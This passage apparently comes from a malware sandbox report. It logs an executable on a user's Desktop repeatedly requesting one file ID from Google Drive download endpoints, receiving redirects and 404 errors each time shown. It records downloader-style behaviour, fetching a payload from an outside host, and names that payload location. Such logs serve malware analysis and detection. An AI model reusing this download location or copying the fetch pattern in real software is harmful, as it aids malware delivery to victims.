                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-tp7mQCslTYlqAhDEE1Dmpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        21 | 192.168.2.6 | 49927 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:34 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:35 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC55gEjPcwPIkiKeViFnktnNt2m9EBXdbAqyNvvmGFR9BdBnSisRSNH7j1tle65LpoiU
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:34 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-vz4pdYJI02uB_MBo4kA2GQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:35 UTC | 1652 | IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NM_T69F1BLffOiJ5To93zg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        22 | 192.168.2.6 | 49937 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:36 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:37 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:37 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-xdjMwMZltQ-38F2WNqF8zA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        23 | 192.168.2.6 | 49943 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:39 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:40 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6-UKSDFlAHi5iY25XwYzkRsM13FxcWxPINHyuX3J8JMWPVJuYJTyF49xGyHjdEEbS-
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:40 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-7UiBQj70X_oDWzDZG3YyaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:40 UTC | 1652 | IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7vQFycKt3HUlcoYHO8dwgg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        24 | 192.168.2.6 | 49950 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:42 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:43 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:42 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-a4TuIXSC2A9xuPwK7za_6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        25 | 192.168.2.6 | 49957 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:44 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:45 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC72YZqPZLiumLD5Y8Jy1CXnGGiwztTeQAjxncm_vbrK8efY83I3jPM7macU6A4sQSKP
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:45 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-b8pNSnWb6XVc0LERxp-cVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:45 UTC | 1652 | IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gCSqjLwgGpm7jzziQMhNKQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        26 | 192.168.2.6 | 49966 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:47 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:48 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:48 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-xXhJskfuR3bPYBrLfitlgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        27 | 192.168.2.6 | 49972 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:50 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:51 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC7yc2n6SdIuTuYUNVjoWTVC1IGdOvIDzPcXcMBs-QlxPlzoDaWxM7eeQnDgD1eQDnFK
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:51 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-j_ulvRD_YUGWkhRTgdKpDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:51 UTC | 1652 | IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j2zJGCaEuRxXM5sXXWxP9w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        28 | 192.168.2.6 | 49979 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:53 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:54 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:53 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-Z-cEnaQQ0PzucXo-q2wP6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        29 | 192.168.2.6 | 49985 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:55 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
